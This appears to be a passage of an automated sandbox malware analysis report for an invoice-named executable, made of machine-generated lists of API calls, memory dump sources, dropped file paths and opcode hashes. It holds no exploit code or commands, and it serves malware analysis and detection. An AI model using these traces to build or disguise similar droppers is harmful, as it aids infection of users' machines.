                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn, xrefs: 00401638
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn
                                                                                                                                                                                                                          • API String ID: 1892508949-1441128270
                                                                                                                                                                                                                          • Opcode ID: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
                                                                                                                                                                                                                          • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405280
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                                                                                                                                                                                            • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                                                                                                                                                                          • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405894
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405871
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                                                                                                                                                                          • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                                                                                                                                                                          • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                                                                                                                                                                          • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                                                                                                                                                                          • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                                                                                                                                                                          • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                                                                                                                                                                          • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                                                                                                                                                                          • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                                                                                                                                                                          • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403203
                                                                                                                                                                                                                            • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(000028FF,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1092082344-0
                                                                                                                                                                                                                          • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                                                                                                                                                                          • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                                                                          • Opcode ID: 79d244419917b53f8b8e7d7fd01716a45f44c9095c55171dbfe81c5390bf0053
                                                                                                                                                                                                                          • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79d244419917b53f8b8e7d7fd01716a45f44c9095c55171dbfe81c5390bf0053
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumErrorLastWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 14984897-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                                                                                                                                                                            • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                                                                                                                                                                            • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                                                                                                                                                                                            • Part of subcall function 004064E8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040583D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                                                                                                            • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D33D,0040CED0,004032EF,0040CED0,0040D33D,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                                                                                                                                                                          • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
